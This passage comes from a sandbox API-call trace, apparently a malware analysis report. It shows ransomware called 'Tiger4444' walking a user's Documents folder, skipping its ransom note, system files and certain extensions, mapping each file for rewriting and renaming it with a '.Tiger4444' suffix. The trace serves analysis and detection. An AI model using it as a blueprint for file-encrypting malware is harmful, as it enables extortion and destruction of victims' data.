dwNumberOfBytesToMap=0x10e0) returned 0xbe0000 [0046.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0046.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0046.585] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0046.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0046.585] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13803813633) returned 1 [0046.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0046.585] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71bf8 | out: hHeap=0xc50000) returned 1 [0046.585] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.585] CloseHandle (hObject=0x2c8) returned 1 [0046.585] CloseHandle (hObject=0x260) returned 1 [0046.586] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\qX7qJ7WfX.pptx.Tiger4444") returned 50 [0046.586] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\qX7qJ7WfX.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\qx7qj7wfx.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\qX7qJ7WfX.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\qx7qj7wfx.pptx.tiger4444"), dwFlags=0x1) returned 1 [0046.586] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=3552 | out: Addend=0xc6f980) returned 21501616 [0046.586] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4771 [0046.586] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c247740, ftCreationTime.dwHighDateTime=0x1d4d078, ftLastAccessTime.dwLowDateTime=0xa70c7c70, ftLastAccessTime.dwHighDateTime=0x1d480e0, ftLastWriteTime.dwLowDateTime=0xa70c7c70, ftLastWriteTime.dwHighDateTime=0x1d480e0, nFileSizeHigh=0x0, nFileSizeLow=0x39db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sfR3PnODJm2Om4GAN.xlsx", cAlternateFileName="SFR3PN~1.XLS")) returned 1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="Tiger4444.exe") returned -1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2=".") returned 1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="..") returned 1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="windows") returned -1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="bootmgr") returned 1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="pagefile.sys") returned 1 [0046.586] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="boot") returned 1 [0046.587] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="ids.txt") returned 1 [0046.587] lstrcmpiW (lpString1="sfR3PnODJm2Om4GAN.xlsx", lpString2="NTUSER.DAT") returned 1 [0046.587] lstrcpyW (in: lpString1=0x30aeadc, lpString2="sfR3PnODJm2Om4GAN.xlsx" | out: lpString1="sfR3PnODJm2Om4GAN.xlsx") returned="sfR3PnODJm2Om4GAN.xlsx" [0046.587] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\sfR3PnODJm2Om4GAN.xlsx", dwFileAttributes=0x0) returned 1 [0046.587] lstrlenW (lpString="sfR3PnODJm2Om4GAN.xlsx") returned 22 [0046.587] lstrlenW (lpString="Tiger4444") returned 9 [0046.587] lstrcmpiW (lpString1="4GAN.xlsx", lpString2="Tiger4444") returned -1 [0046.587] lstrlenW (lpString=".dll") returned 4 [0046.587] lstrcmpiW (lpString1="xlsx", lpString2=".dll") returned 1 [0046.587] lstrlenW (lpString=".lnk") returned 4 [0046.587] lstrcmpiW (lpString1="xlsx", lpString2=".lnk") returned 1 [0046.587] lstrlenW (lpString=".ini") returned 4 [0046.587] lstrcmpiW (lpString1="xlsx", lpString2=".ini") returned 1 [0046.587] lstrlenW (lpString=".sys") returned 4 [0046.587] lstrcmpiW (lpString1="xlsx", lpString2=".sys") returned 1 [0046.587] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\sfR3PnODJm2Om4GAN.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\sfr3pnodjm2om4gan.xlsx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.587] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.587] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13804027115) returned 1 [0046.587] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=14811) returned 1 [0046.587] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0046.587] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0046.587] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3ce0, lpName=0x0) returned 0x2c8 [0046.587] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ce0) returned 0xbe0000 [0046.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0046.588] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0046.588] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.588] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0046.588] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.588] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0046.588] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13804146109) returned 1 [0046.588] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0046.588] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0046.588] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.590] CloseHandle (hObject=0x2c8) returned 1 [0046.590] CloseHandle (hObject=0x260) returned 1 [0046.591] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\sfR3PnODJm2Om4GAN.xlsx.Tiger4444") returned 58 [0046.591] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\sfR3PnODJm2Om4GAN.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\sfr3pnodjm2om4gan.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\sfR3PnODJm2Om4GAN.xlsx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\sfr3pnodjm2om4gan.xlsx.tiger4444"), dwFlags=0x1) returned 1 [0046.591] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=14816 | out: Addend=0xc6f980) returned 21505168 [0046.591] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4772 [0046.592] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8253dbe0, ftCreationTime.dwHighDateTime=0x1d4cacc, ftLastAccessTime.dwLowDateTime=0x38394660, ftLastAccessTime.dwHighDateTime=0x1d4d302, ftLastWriteTime.dwLowDateTime=0x38394660, ftLastWriteTime.dwHighDateTime=0x1d4d302, nFileSizeHigh=0x0, nFileSizeLow=0x28bc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="siSo J5a.csv", cAlternateFileName="SISOJ5~1.CSV")) returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="Tiger4444.exe") returned -1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2=".") returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="..") returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="windows") returned -1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="bootmgr") returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="pagefile.sys") returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="boot") returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="ids.txt") returned 1 [0046.592] lstrcmpiW (lpString1="siSo J5a.csv", lpString2="NTUSER.DAT") returned 1 [0046.592] lstrcpyW (in: lpString1=0x30aeadc, lpString2="siSo J5a.csv" | out: lpString1="siSo J5a.csv") returned="siSo J5a.csv" [0046.592] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\siSo J5a.csv", dwFileAttributes=0x0) returned 1 [0046.592] lstrlenW (lpString="siSo J5a.csv") returned 12 [0046.592] lstrlenW (lpString="Tiger4444") returned 9 [0046.592] lstrcmpiW (lpString1="o J5a.csv", lpString2="Tiger4444") returned -1 [0046.592] lstrlenW (lpString=".dll") returned 4 [0046.592] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0046.592] lstrlenW (lpString=".lnk") returned 4 [0046.592] lstrcmpiW (lpString1=".csv", lpString2=".lnk") returned -1 [0046.592] lstrlenW (lpString=".ini") returned 4 [0046.592] lstrcmpiW (lpString1=".csv", lpString2=".ini") returned -1 [0046.592] lstrlenW (lpString=".sys") returned 4 [0046.592] lstrcmpiW (lpString1=".csv", lpString2=".sys") returned -1 [0046.592] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\siSo J5a.csv" (normalized: "c:\\users\\fd1hvy\\documents\\siso j5a.csv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.592] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.592] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13804558642) returned 1 [0046.593] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=10428) returned 1 [0046.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89608 [0046.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71840 [0046.593] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2bc0, lpName=0x0) returned 0x2c8 [0046.593] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2bc0) returned 0xbe0000 [0046.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0046.593] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0046.593] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.594] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0046.594] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.594] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0046.594] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13804674967) returned 1 [0046.594] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89608 | out: hHeap=0xc50000) returned 1 [0046.594] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71840 | out: hHeap=0xc50000) returned 1 [0046.594] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.594] CloseHandle (hObject=0x2c8) returned 1 [0046.594] CloseHandle (hObject=0x260) returned 1 [0046.597] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\siSo J5a.csv.Tiger4444") returned 48 [0046.597] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\siSo J5a.csv" (normalized: "c:\\users\\fd1hvy\\documents\\siso j5a.csv"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\siSo J5a.csv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\siso j5a.csv.tiger4444"), dwFlags=0x1) returned 1 [0046.598] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=10432 | out: Addend=0xc6f980) returned 21519984 [0046.598] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4773 [0046.598] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83207b0, ftCreationTime.dwHighDateTime=0x1d4d445, ftLastAccessTime.dwLowDateTime=0xab0d58e0, ftLastAccessTime.dwHighDateTime=0x1d50c85, ftLastWriteTime.dwLowDateTime=0xab0d58e0, ftLastWriteTime.dwHighDateTime=0x1d50c85, nFileSizeHigh=0x0, nFileSizeLow=0x79c0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zGVRPL4IiUF2BCKlPu.pptx", cAlternateFileName="ZGVRPL~1.PPT")) returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="Tiger4444.exe") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2=".") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="..") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="windows") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="bootmgr") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="pagefile.sys") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="boot") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="ids.txt") returned 1 [0046.598] lstrcmpiW (lpString1="zGVRPL4IiUF2BCKlPu.pptx", lpString2="NTUSER.DAT") returned 1 [0046.598] lstrcpyW (in: lpString1=0x30aeadc, lpString2="zGVRPL4IiUF2BCKlPu.pptx" | out: lpString1="zGVRPL4IiUF2BCKlPu.pptx") returned="zGVRPL4IiUF2BCKlPu.pptx" [0046.598] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zGVRPL4IiUF2BCKlPu.pptx", dwFileAttributes=0x0) returned 1 [0046.598] lstrlenW (lpString="zGVRPL4IiUF2BCKlPu.pptx") returned 23 [0046.598] lstrlenW (lpString="Tiger4444") returned 9 [0046.598] lstrcmpiW (lpString1="KlPu.pptx", lpString2="Tiger4444") returned -1 [0046.598] lstrlenW (lpString=".dll") returned 4 [0046.598] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0046.598] lstrlenW (lpString=".lnk") returned 4 [0046.598] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0046.598] lstrlenW (lpString=".ini") returned 4 [0046.598] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0046.598] lstrlenW (lpString=".sys") returned 4 [0046.598] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0046.598] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\zGVRPL4IiUF2BCKlPu.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\zgvrpl4iiuf2bcklpu.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.599] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.599] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13805170172) returned 1 [0046.599] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=31168) returned 1 [0046.599] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89680 [0046.599] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0046.599] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7cc0, lpName=0x0) returned 0x2c8 [0046.599] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7cc0) returned 0xbe0000 [0046.600] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.600] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0046.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.600] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75fe0 [0046.600] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75fe0 | out: hHeap=0xc50000) returned 1 [0046.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0046.600] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13805337513) returned 1 [0046.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89680 | out: hHeap=0xc50000) returned 1 [0046.600] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0046.600] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.601] CloseHandle (hObject=0x2c8) returned 1 [0046.601] CloseHandle (hObject=0x260) returned 1 [0046.601] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\zGVRPL4IiUF2BCKlPu.pptx.Tiger4444") returned 59 [0046.601] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\zGVRPL4IiUF2BCKlPu.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\zgvrpl4iiuf2bcklpu.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\zGVRPL4IiUF2BCKlPu.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\zgvrpl4iiuf2bcklpu.pptx.tiger4444"), dwFlags=0x1) returned 1 [0046.602] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=31168 | out: Addend=0xc6f980) returned 21530416 [0046.602] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4774 [0046.602] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49238e90, ftCreationTime.dwHighDateTime=0x1d49ea0, ftLastAccessTime.dwLowDateTime=0x8db0c0f0, ftLastAccessTime.dwHighDateTime=0x1d4e41e, ftLastWriteTime.dwLowDateTime=0x8db0c0f0, ftLastWriteTime.dwHighDateTime=0x1d4e41e, nFileSizeHigh=0x0, nFileSizeLow=0x105f3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FMzdb HzQF-E.pptx", cAlternateFileName="_FMZDB~1.PPT")) returned 1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="Tiger4444.exe") returned -1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2=".") returned 1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="..") returned 1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="windows") returned -1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="bootmgr") returned -1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="pagefile.sys") returned -1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="boot") returned -1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="ids.txt") returned -1 [0046.602] lstrcmpiW (lpString1="_FMzdb HzQF-E.pptx", lpString2="NTUSER.DAT") returned -1 [0046.602] lstrcpyW (in: lpString1=0x30aeadc, lpString2="_FMzdb HzQF-E.pptx" | out: lpString1="_FMzdb HzQF-E.pptx") returned="_FMzdb HzQF-E.pptx" [0046.602] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\_FMzdb HzQF-E.pptx", dwFileAttributes=0x0) returned 1 [0046.602] lstrlenW (lpString="_FMzdb HzQF-E.pptx") returned 18 [0046.602] lstrlenW (lpString="Tiger4444") returned 9 [0046.602] lstrcmpiW (lpString1="QF-E.pptx", lpString2="Tiger4444") returned -1 [0046.602] lstrlenW (lpString=".dll") returned 4 [0046.602] lstrcmpiW (lpString1="pptx", lpString2=".dll") returned 1 [0046.602] lstrlenW (lpString=".lnk") returned 4 [0046.602] lstrcmpiW (lpString1="pptx", lpString2=".lnk") returned 1 [0046.603] lstrlenW (lpString=".ini") returned 4 [0046.603] lstrcmpiW (lpString1="pptx", lpString2=".ini") returned 1 [0046.603] lstrlenW (lpString=".sys") returned 4 [0046.603] lstrcmpiW (lpString1="pptx", lpString2=".sys") returned 1 [0046.603] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\_FMzdb HzQF-E.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\_fmzdb hzqf-e.pptx"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0046.603] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0046.603] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13805589721) returned 1 [0046.603] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=67059) returned 1 [0046.603] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0046.603] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71400 [0046.603] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10900, lpName=0x0) returned 0x2c8 [0046.603] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10900) returned 0xbe0000 [0046.606] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0046.606] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0046.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0046.606] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0046.606] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0046.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0046.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0046.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0046.606] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13805953901) returned 1 [0046.606] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0046.607] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71400 | out: hHeap=0xc50000) returned 1 [0046.607] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0046.607] CloseHandle (hObject=0x2c8) returned 1 [0046.607] CloseHandle (hObject=0x260) returned 1 [0046.608] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\_FMzdb HzQF-E.pptx.Tiger4444") returned 54 [0046.608] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\_FMzdb HzQF-E.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\_fmzdb hzqf-e.pptx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\_FMzdb HzQF-E.pptx.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\_fmzdb hzqf-e.pptx.tiger4444"), dwFlags=0x1) returned 1 [0046.608] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=67072 | out: Addend=0xc6f980) returned 21561584 [0046.608] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=3 | out: Addend=0xc6f98c) returned 4775 [0046.608] FindNextFileW (in: hFindFile=0xc72e48, lpFindFileData=0x30adf58 | out: 